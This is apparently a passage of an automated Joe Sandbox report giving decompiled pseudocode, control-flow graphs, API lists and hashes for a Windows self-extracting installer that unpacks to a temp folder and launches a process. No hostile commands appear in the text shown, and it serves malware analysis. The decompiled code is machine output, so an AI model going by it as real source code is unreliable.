                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$IXP$IXP%03d.TMP
                              • API String ID: 1082909758-775753704
                              • Opcode ID: 0f262f1d7a1493f7273ca7ce618721fd36e24b9dcdea7b91d1d906cb790ec2fa
                              • Instruction ID: 6a0d9dcecac6b2ca5434bdcc4a162de7b2fdb8969ef20146aeea750450ce180b
                              • Opcode Fuzzy Hash: 0f262f1d7a1493f7273ca7ce618721fd36e24b9dcdea7b91d1d906cb790ec2fa
                              • Instruction Fuzzy Hash: 0F11E671700104ABE7209A379C4CFEF3AEDEBD5B25F004465B6C697180CE7989428760
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 519 10e256d-10e257d 520 10e2622-10e2627 call 10e24e0 519->520 521 10e2583-10e2589 519->521 528 10e2629-10e262f 520->528 523 10e258b 521->523 524 10e25e8-10e2607 RegOpenKeyExA 521->524 523->528 529 10e2591-10e2595 523->529 525 10e2609-10e2620 RegQueryInfoKeyA 524->525 526 10e25e3-10e25e6 524->526 530 10e25d1-10e25dd RegCloseKey 525->530 526->528 529->528 531 10e259b-10e25ba RegOpenKeyExA 529->531 530->526 531->526 532 10e25bc-10e25cb RegQueryValueExA 531->532 532->530
                              C-Code - Quality: 86%
                              			E010E256D(signed int __ecx) {
                              				int _v8;
                              				void* _v12;
                              				signed int _t13;
                              				signed int _t19;
                              				long _t24;
                              				void* _t26;
                              				int _t31;
                              				void* _t34;
                              
                              				_push(__ecx);
                              				_push(__ecx);
                              				_t13 = __ecx & 0x0000ffff;
                              				_t31 = 0;
                              				if(_t13 == 0) {
                              					_t31 = E010E24E0(_t26);
                              				} else {
                              					_t34 = _t13 - 1;
                              					if(_t34 == 0) {
                              						_v8 = 0;
                              						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                              							goto L7;
                              						} else {
                              							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                              							goto L6;
                              						}
                              						L12:
                              					} else {
                              						if(_t34 > 0 && __ecx <= 3) {
                              							_v8 = 0;
                              							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                              							if(_t24 == 0) {
                              								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                              								L6:
                              								asm("sbb eax, eax");
                              								_v8 = _v8 &  !( ~_t19);
                              								RegCloseKey(_v12); // executed
                              							}
                              							L7:
                              							_t31 = _v8;
                              						}
                              					}
                              				}
                              				return _t31;
                              				goto L12;
                              			}

                              APIs
                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,010E4096,010E4096,?,010E1ED3,00000001,00000000,?,?,010E4137,?), ref: 010E25B2
                              • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,010E4096,?,010E1ED3,00000001,00000000,?,?,010E4137,?,010E4096), ref: 010E25CB
                              • RegCloseKey.KERNELBASE(?,?,010E1ED3,00000001,00000000,?,?,010E4137,?,010E4096), ref: 010E25DD
                              • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,010E4096,010E4096,?,010E1ED3,00000001,00000000,?,?,010E4137,?), ref: 010E25FF
                              • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,010E4096,00000000,00000000,00000000,00000000,?,010E1ED3,00000001,00000000), ref: 010E261A
                              Strings
                              • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 010E25F5
                              • System\CurrentControlSet\Control\Session Manager, xrefs: 010E25A8
                              • PendingFileRenameOperations, xrefs: 010E25C3
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: OpenQuery$CloseInfoValue
                              • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                              • API String ID: 2209512893-559176071
                              • Opcode ID: f663290c762d9626766ee04d7c4884a31513647bc968820e24f38837f93f80da
                              • Instruction ID: d49b77bffc8b3a3f50410c9e8e88aa2efa433491c4373ba15a07496f1dd30b04
                              • Opcode Fuzzy Hash: f663290c762d9626766ee04d7c4884a31513647bc968820e24f38837f93f80da
                              • Instruction Fuzzy Hash: 90116335902228FFDB20DB979C0DDFF7EFCEB056A1F114195B989A2000D6714A44D6A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 533 10e6a60-10e6a91 call 10e7155 call 10e7208 GetStartupInfoW 539 10e6a93-10e6aa2 533->539 540 10e6abc-10e6abe 539->540 541 10e6aa4-10e6aa6 539->541 544 10e6abf-10e6ac5 540->544 542 10e6aaf-10e6aba Sleep 541->542 543 10e6aa8-10e6aad 541->543 542->539 543->544 545 10e6ac7-10e6acf _amsg_exit 544->545 546 10e6ad1-10e6ad7 544->546 547 10e6b0b-10e6b11 545->547 548 10e6ad9-10e6ae9 call 10e6c3f 546->548 549 10e6b05 546->549 551 10e6b2e-10e6b30 547->551 552 10e6b13-10e6b24 _initterm 547->552 553 10e6aee-10e6af2 548->553 549->547 554 10e6b3b-10e6b42 551->554 555 10e6b32-10e6b39 551->555 552->551 553->547 558 10e6af4-10e6b00 553->558 556 10e6b67-10e6b71 554->556 557 10e6b44-10e6b51 call 10e7060 554->557 555->554 560 10e6b74-10e6b79 556->560 557->556 566 10e6b53-10e6b65 557->566 561 10e6c39-10e6c3e call 10e724d 558->561 564 10e6b7b-10e6b7d 560->564 565 10e6bc5-10e6bc8 560->565 570 10e6b7f-10e6b81 564->570 571 10e6b94-10e6b98 564->571 567 10e6bca-10e6bd3 565->567 568 10e6bd6-10e6be3 _ismbblead 565->568 566->556 567->568 572 10e6be9-10e6bed 568->572 573 10e6be5-10e6be6 568->573 570->565 574 10e6b83-10e6b85 570->574 575 10e6b9a-10e6b9e 571->575 576 10e6ba0-10e6ba2 571->576 572->560 579 10e6c1e-10e6c25 572->579 573->572 574->571 580 10e6b87-10e6b8a 574->580 577 10e6ba3-10e6bbc call 10e2bfb 575->577 576->577 577->579 586 10e6bbe-10e6bbf exit 577->586 582 10e6c27-10e6c2d _cexit 579->582 583 10e6c32 579->583 580->571 584 10e6b8c-10e6b92 580->584 582->583 583->561 584->574 586->565
                              C-Code - Quality: 51%
                              			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                              				signed int* _t25;
                              				signed int _t26;
                              				signed int _t29;
                              				int _t30;
                              				signed int _t37;
                              				signed char _t41;
                              				signed int _t53;
                              				signed int _t54;
                              				intOrPtr _t56;
                              				signed int _t58;
                              				signed int _t59;
                              				intOrPtr* _t60;
                              				void* _t62;
                              				void* _t67;
                              				void* _t68;
                              
                              				E010E7155();
                              				_push(0x58);
                              				_push(0x10e72b8);
                              				E010E7208(__ebx, __edi, __esi);
                              				 *(_t62 - 0x20) = 0;
                              				GetStartupInfoW(_t62 - 0x68);
                              				 *((intOrPtr*)(_t62 - 4)) = 0;
                              				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                              				_t53 = 0;
                              				while(1) {
                              					asm("lock cmpxchg [edx], ecx");
                              					if(0 == 0) {
                              						break;
                              					}
                              					if(0 != _t56) {
                              						Sleep(0x3e8);
                              						continue;
                              					} else {
                              						_t58 = 1;
                              						_t53 = 1;
                              					}
                              					L7:
                              					_t67 =  *0x10e88b0 - _t58; // 0x2
                              					if(_t67 != 0) {
                              						__eflags =  *0x10e88b0; // 0x2
                              						if(__eflags != 0) {
                              							 *0x10e81e4 = _t58;
                              							goto L13;
                              						} else {
                              							 *0x10e88b0 = _t58;
                              							_t37 = E010E6C3F(0x10e10b8, 0x10e10c4); // executed
                              							__eflags = _t37;
                              							if(__eflags == 0) {
                              								goto L13;
                              							} else {
                              								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                              								_t30 = 0xff;
                              							}
                              						}
                              					} else {
                              						_push(0x1f);
                              						L010E6FF4();
                              						L13:
                              						_t68 =  *0x10e88b0 - _t58; // 0x2
                              						if(_t68 == 0) {
                              							_push(0x10e10b4);
                              							_push(0x10e10ac);
                              							L010E7202();
                              							 *0x10e88b0 = 2;
                              						}
                              						if(_t53 == 0) {
                              							 *0x10e88ac = 0;
                              						}
                              						_t71 =  *0x10e88b4;
                              						if( *0x10e88b4 != 0 && E010E7060(_t71, 0x10e88b4) != 0) {
                              							_t60 =  *0x10e88b4; // 0x0
                              							 *0x10ea288(0, 2, 0);
                              							 *_t60();
                              						}
                              						_t25 = __imp___acmdln; // 0x76235b9c
                              						_t59 =  *_t25;
                              						 *(_t62 - 0x1c) = _t59;
                              						_t54 =  *(_t62 - 0x20);
                              						while(1) {
                              							_t41 =  *_t59;
                              							if(_t41 > 0x20) {
                              								goto L32;
                              							}
                              							if(_t41 != 0) {
                              								if(_t54 != 0) {
                              									goto L32;
                              								} else {
                              									while(_t41 != 0 && _t41 <= 0x20) {
                              										_t59 = _t59 + 1;
                              										 *(_t62 - 0x1c) = _t59;
                              										_t41 =  *_t59;
                              									}
                              								}
                              							}
                              							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                              							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                              								_t29 = 0xa;
                              							} else {
                              								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                              							}
                              							_push(_t29);
                              							_t30 = E010E2BFB(0x10e0000, 0, _t59); // executed
                              							 *0x10e81e0 = _t30;
                              							__eflags =  *0x10e81f8;
                              							if( *0x10e81f8 == 0) {
                              								exit(_t30); // executed
                              								goto L32;
                              							}
                              							__eflags =  *0x10e81e4;
                              							if( *0x10e81e4 == 0) {
                              								__imp___cexit();
                              								_t30 =  *0x10e81e0; // 0x0
                              							}
                              							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                              							goto L40;
                              							L32:
                              							__eflags = _t41 - 0x22;
                              							if(_t41 == 0x22) {
                              								__eflags = _t54;
                              								_t15 = _t54 == 0;
                              								__eflags = _t15;
                              								_t54 = 0 | _t15;
                              								 *(_t62 - 0x20) = _t54;
                              							}
                              							_t26 = _t41 & 0x000000ff;
                              							__imp___ismbblead(_t26);
                              							__eflags = _t26;
                              							if(_t26 != 0) {
                              								_t59 = _t59 + 1;
                              								__eflags = _t59;
                              								 *(_t62 - 0x1c) = _t59;
                              							}
                              							_t59 = _t59 + 1;
                              							 *(_t62 - 0x1c) = _t59;
                              						}
                              					}
                              					L40:
                              					return E010E724D(_t30);
                              				}
                              				_t58 = 1;
                              				__eflags = 1;
                              				goto L7;
                              			}



















                              APIs
                                • Part of subcall function 010E7155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 010E7182
                                • Part of subcall function 010E7155: GetCurrentProcessId.KERNEL32 ref: 010E7191
                                • Part of subcall function 010E7155: GetCurrentThreadId.KERNEL32 ref: 010E719A
                                • Part of subcall function 010E7155: GetTickCount.KERNEL32 ref: 010E71A3
                                • Part of subcall function 010E7155: QueryPerformanceCounter.KERNEL32(?), ref: 010E71B8
                              • GetStartupInfoW.KERNEL32(?,010E72B8,00000058), ref: 010E6A7F
                              • Sleep.KERNEL32(000003E8), ref: 010E6AB4
                              • _amsg_exit.MSVCRT ref: 010E6AC9
                              • _initterm.MSVCRT ref: 010E6B1D
                              • __IsNonwritableInCurrentImage.LIBCMT ref: 010E6B49
                              • exit.KERNELBASE ref: 010E6BBF
                              • _ismbblead.MSVCRT ref: 010E6BDA
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                              • String ID:
                              • API String ID: 836923961-0
                              • Opcode ID: 61ac8d9d109f27df30314f3cfd927d5abf5d93f87a1b298f9481ce44dcc37277
                              • Instruction ID: 1abba974472e59e35631f0bba7cf7dfe9aa5dc7316f4ea2784cfc9b2f2562fd7
                              • Opcode Fuzzy Hash: 61ac8d9d109f27df30314f3cfd927d5abf5d93f87a1b298f9481ce44dcc37277
                              • Instruction Fuzzy Hash: E141C735A44365CFDF719B6FF90C76E7BE4AB54B10F14415EE9C19B280CB7A84808B80
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 587 10e58c8-10e58d5 588 10e58d8-10e58dd 587->588 588->588 589 10e58df-10e58f1 LocalAlloc 588->589 590 10e5919-10e5959 call 10e1680 call 10e658a CreateFileA LocalFree 589->590 591 10e58f3-10e5901 call 10e44b9 589->591 594 10e5906-10e5910 call 10e6285 590->594 601 10e595b-10e596c CloseHandle GetFileAttributesA 590->601 591->594 600 10e5912-10e5918 594->600 601->594 602 10e596e-10e5970 601->602 602->594 603 10e5972-10e597b 602->603 603->600
                              C-Code - Quality: 95%
                              			E010E58C8(intOrPtr* __ecx) {
                              				void* _v8;
                              				intOrPtr _t6;
                              				void* _t10;
                              				void* _t12;
                              				void* _t14;
                              				signed char _t16;
                              				void* _t20;
                              				void* _t23;
                              				intOrPtr* _t27;
                              				CHAR* _t33;
                              
                              				_push(__ecx);
                              				_t33 = __ecx;
                              				_t27 = __ecx;
                              				_t23 = __ecx + 1;
                              				do {
                              					_t6 =  *_t27;
                              					_t27 = _t27 + 1;
                              				} while (_t6 != 0);
                              				_t36 = _t27 - _t23 + 0x14;
                              				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                              				if(_t20 != 0) {
                              					E010E1680(_t20, _t36, _t33);
                              					E010E658A(_t20, _t36, "TMP4351$.TMP");
                              					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                              					_v8 = _t10;
                              					LocalFree(_t20);
                              					_t12 = _v8;
                              					if(_t12 == 0xffffffff) {
                              						goto L4;
                              					} else {
                              						CloseHandle(_t12);
                              						_t16 = GetFileAttributesA(_t33); // executed
                              						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                              							goto L4;
                              						} else {
                              							 *0x10e9124 = 0;
                              							_t14 = 1;
                              						}
                              					}
                              				} else {
                              					E010E44B9(0, 0x4b5, 0, 0, 0x10, 0);
                              					L4:
                              					 *0x10e9124 = E010E6285();
                              					_t14 = 0;
                              				}
                              				return _t14;
                              			}














                              APIs
                              • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,010E5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010E58E7
                              • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,010E5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010E5943
                              • LocalFree.KERNEL32(00000000,?,010E5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010E594D
                              • CloseHandle.KERNEL32(00000000,?,010E5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010E595C
                              • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,010E5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010E5963
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$TMP4351$.TMP
                              • API String ID: 747627703-1664176527
                              • Opcode ID: efe354bdbd4c105e75b91ccba9e0fea39f0ec8048caba0d87e734d73f83d807f
                              • Instruction ID: 9ca697ab06736a231533094b8cfa5b77cc717e1bc5258c7ce378bb753055aecc
                              • Opcode Fuzzy Hash: efe354bdbd4c105e75b91ccba9e0fea39f0ec8048caba0d87e734d73f83d807f
                              • Instruction Fuzzy Hash: 50112671700211AFD7345E7B6C4CADB7EDDDF8A664B000A59B5C5D72C4CA75D80587A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 631 10e3fef-10e4010 632 10e410a-10e411a call 10e6ce0 631->632 633 10e4016-10e403b CreateProcessA 631->633 634 10e40c4-10e4101 call 10e6285 GetLastError FormatMessageA call 10e44b9 633->634 635 10e4041-10e406e WaitForSingleObject GetExitCodeProcess 633->635 647 10e4106 634->647 637 10e4070-10e4077 635->637 638 10e4091 call 10e411b 635->638 637->638 642 10e4079-10e407b 637->642 646 10e4096-10e40b8 CloseHandle * 2 638->646 642->638 645 10e407d-10e4089 642->645 645->638 648 10e408b 645->648 649 10e40ba-10e40c0 646->649 650 10e4108 646->650 647->650 648->638 649->650 651 10e40c2 649->651 650->632 651->647
                              C-Code - Quality: 84%
                              			E010E3FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                              				signed int _v8;
                              				char _v524;
                              				long _v528;
                              				struct _PROCESS_INFORMATION _v544;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t20;
                              				void* _t22;
                              				int _t25;
                              				intOrPtr* _t39;
                              				signed int _t44;
                              				void* _t49;
                              				signed int _t50;
                              				intOrPtr _t53;
                              
                              				_t45 = __edx;
                              				_t20 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t20 ^ _t50;
                              				_t39 = __ecx;
                              				_t49 = 1;
                              				_t22 = 0;
                              				if(__ecx == 0) {
                              					L13:
                              					return E010E6CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                              				}
                              				asm("stosd");
                              				asm("stosd");
                              				asm("stosd");
                              				asm("stosd");
                              				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                              				if(_t25 == 0) {
                              					 *0x10e9124 = E010E6285();
                              					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
                              					_t45 = 0x4c4;
                              					E010E44B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
                              					L11:
                              					_t49 = 0;
                              					L12:
                              					_t22 = _t49;
                              					goto L13;
                              				}
                              				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                              				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                              				_t44 = _v528;
                              				_t53 =  *0x10e8a28; // 0x0
                              				if(_t53 == 0) {
                              					_t34 =  *0x10e9a2c; // 0x0
                              					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                              						_t34 = _t44 & 0xff000000;
                              						if((_t44 & 0xff000000) == 0xaa000000) {
                              							 *0x10e9a2c = _t44;
                              						}
                              					}
                              				}
                              				E010E411B(_t34, _t44);
                              				CloseHandle(_v544.hThread);
                              				CloseHandle(_v544);
                              				if(( *0x10e9a34 & 0x00000400) == 0 || _v528 >= 0) {
                              					goto L12;
                              				} else {
                              					goto L11;
                              				}
                              			}



















                              APIs
                              • CreateProcessA.KERNELBASE ref: 010E4033
                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 010E4049
                              • GetExitCodeProcess.KERNELBASE ref: 010E405C
                              • CloseHandle.KERNEL32(?), ref: 010E409C
                              • CloseHandle.KERNEL32(?), ref: 010E40A8
                              • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 010E40DC
                              • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 010E40E9
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                              • String ID:
                              • API String ID: 3183975587-0
                              • Opcode ID: a339ef117bee2d34e4715199f0b2a0a299b5ab62e34ce1b4857dab86e35af7b4
                              • Instruction ID: c9a7ca6f3d69e3b098b3ddce46bad10dbc1a1961632d82b46650e771452c72f0
                              • Opcode Fuzzy Hash: a339ef117bee2d34e4715199f0b2a0a299b5ab62e34ce1b4857dab86e35af7b4
                              • Instruction Fuzzy Hash: D3319E31640208AFEB709B67DC4CFAB7BF8EBD8B10F1001A9F685D6191C63688858B50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 652 10e51e5-10e520b call 10e468f LocalAlloc 655 10e522d-10e523c call 10e468f 652->655 656 10e520d-10e5228 call 10e44b9 call 10e6285 652->656 661 10e523e-10e5260 call 10e44b9 LocalFree 655->661 662 10e5262-10e5270 lstrcmpA 655->662 671 10e52b0 656->671 661->671 665 10e527e-10e529c call 10e44b9 LocalFree 662->665 666 10e5272-10e5273 LocalFree 662->666 674 10e529e-10e52a4 665->674 675 10e52a6 665->675 669 10e5279-10e527c 666->669 672 10e52b2-10e52b5 669->672 671->672 674->669 675->671
                              C-Code - Quality: 100%
                              			E010E51E5(void* __eflags) {
                              				int _t5;
                              				void* _t6;
                              				void* _t28;
                              
                              				_t1 = E010E468F("UPROMPT", 0, 0) + 1; // 0x1
                              				_t28 = LocalAlloc(0x40, _t1);
                              				if(_t28 != 0) {
                              					if(E010E468F("UPROMPT", _t28, _t29) != 0) {
                              						_t5 = lstrcmpA(_t28, "<None>"); // executed
                              						if(_t5 != 0) {
                              							_t6 = E010E44B9(0, 0x3e9, _t28, 0, 0x20, 4);
                              							LocalFree(_t28);
                              							if(_t6 != 6) {
                              								 *0x10e9124 = 0x800704c7;
                              								L10:
                              								return 0;
                              							}
                              							 *0x10e9124 = 0;
                              							L6:
                              							return 1;
                              						}
                              						LocalFree(_t28);
                              						goto L6;
                              					}
                              					E010E44B9(0, 0x4b1, 0, 0, 0x10, 0);
                              					LocalFree(_t28);
                              					 *0x10e9124 = 0x80070714;
                              					goto L10;
                              				}
                              				E010E44B9(0, 0x4b5, 0, 0, 0x10, 0);
                              				 *0x10e9124 = E010E6285();
                              				goto L10;
                              			}







                              APIs
                                • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46A0
                                • Part of subcall function 010E468F: SizeofResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46A9
                                • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46C3
                                • Part of subcall function 010E468F: LoadResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46CC
                                • Part of subcall function 010E468F: LockResource.KERNEL32(00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46D3
                                • Part of subcall function 010E468F: memcpy_s.MSVCRT ref: 010E46E5
                                • Part of subcall function 010E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46EF
                              • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,010E2F4D,?,00000002,00000000), ref: 010E5201
                              • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 010E5250
                                • Part of subcall function 010E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010E4518
                                • Part of subcall function 010E44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 010E4554
                                • Part of subcall function 010E6285: GetLastError.KERNEL32(010E5BBC), ref: 010E6285
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                              • String ID: <None>$UPROMPT
                              • API String ID: 957408736-2980973527
                              • Opcode ID: 9669a2a982c3f5bb1b1a974f5824fd3355ae463faeaf561fa05f313489acdecc
                              • Instruction ID: 2ef279feae4561338a3073a1ec9ca435e35867b0030113018d811bd1d303ef90
                              • Opcode Fuzzy Hash: 9669a2a982c3f5bb1b1a974f5824fd3355ae463faeaf561fa05f313489acdecc
                              • Instruction Fuzzy Hash: 8B11B6B5700201EFD3756B779C4CB7B65DDEB8DB98B00486DB6C2DA284DA7ECC014224
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 74%
                              			E010E52B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                              				signed int _v8;
                              				char _v268;
                              				signed int _t9;
                              				signed int _t11;
                              				void* _t21;
                              				void* _t29;
                              				CHAR** _t31;
                              				void* _t32;
                              				signed int _t33;
                              
                              				_t28 = __edi;
                              				_t22 = __ecx;
                              				_t21 = __ebx;
                              				_t9 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t9 ^ _t33;
                              				_push(__esi);
                              				_t31 =  *0x10e91e0; // 0x34b71c0
                              				if(_t31 != 0) {
                              					_push(__edi);
                              					do {
                              						_t29 = _t31;
                              						if( *0x10e8a24 == 0 &&  *0x10e9a30 == 0) {
                              							SetFileAttributesA( *_t31, 0x80); // executed
                              							DeleteFileA( *_t31); // executed
                              						}
                              						_t31 = _t31[1];
                              						LocalFree( *_t29);
                              						LocalFree(_t29);
                              					} while (_t31 != 0);
                              					_pop(_t28);
                              				}
                              				_t11 =  *0x10e8a20; // 0x0
                              				_pop(_t32);
                              				if(_t11 != 0 &&  *0x10e8a24 == 0 &&  *0x10e9a30 == 0) {
                              					_push(_t22);
                              					E010E1781( &_v268, 0x104, _t22, "C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
                              					if(( *0x10e9a34 & 0x00000020) != 0) {
